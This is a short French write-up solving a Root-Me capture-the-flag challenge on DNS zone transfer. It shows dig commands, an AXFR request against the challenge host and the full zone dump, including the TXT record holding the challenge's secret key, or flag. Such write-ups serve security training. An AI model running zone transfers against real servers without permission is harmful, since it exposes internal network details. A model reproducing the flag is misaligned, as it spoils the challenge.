DNS transfert de zone
Solution
Attention à bien lire le challenge:
Un administrateur peu consciencieux a mis en place un service DNS pour le domaine "ch11.challenge01.root-me.org"...
En premier nous avons le domaine ch11.challenge01.root-me.org puis challenge01.root-me.org. Il faut donc réaliser un transfert de zone entre ces deux domaines.
Paramètres de connexion au challenge Hôte challenge01.root-me.org Protocole DNS Port 54011
$ dig root-me.org 54011 +short
212.129.28.16
$ dig challenge01.root-me.org 54011 +short
212.129.38.224
$ dig root-me.org NS +short
ns200.anycast.me.
dns200.anycast.me.
AXFR
$ dig axfr @challenge01.root-me.org ch11.challenge01.root-me.org -p 54011
; <<>> DiG 9.16.1-Ubuntu <<>> axfr @challenge01.root-me.org ch11.challenge01.root-me.org -p 54011
; (2 servers found)
;; global options: +cmd
ch11.challenge01.root-me.org. 604800 IN SOA ch11.challenge01.root-me.org. root.ch11.challenge01.root-me.org. 2 604800 86400 2419200 604800
ch11.challenge01.root-me.org. 604800 IN TXT "DNS transfer secret key : CBkFRwfNMMtRjHY"
ch11.challenge01.root-me.org. 604800 IN NS ch11.challenge01.root-me.org.
ch11.challenge01.root-me.org. 604800 IN A 127.0.0.1
challenge01.ch11.challenge01.root-me.org. 604800 IN A 192.168.27.101
ch11.challenge01.root-me.org. 604800 IN SOA ch11.challenge01.root-me.org. root.ch11.challenge01.root-me.org. 2 604800 86400 2419200 604800
;; Query time: 11 msec
;; SERVER: 212.129.38.224#54011(212.129.38.224)
;; WHEN: sam. sept. 11 12:13:40 CEST 2021
;; XFR size: 6 records (messages 1, bytes 274)
On peut apercevoir une secret key qui correspond au flag: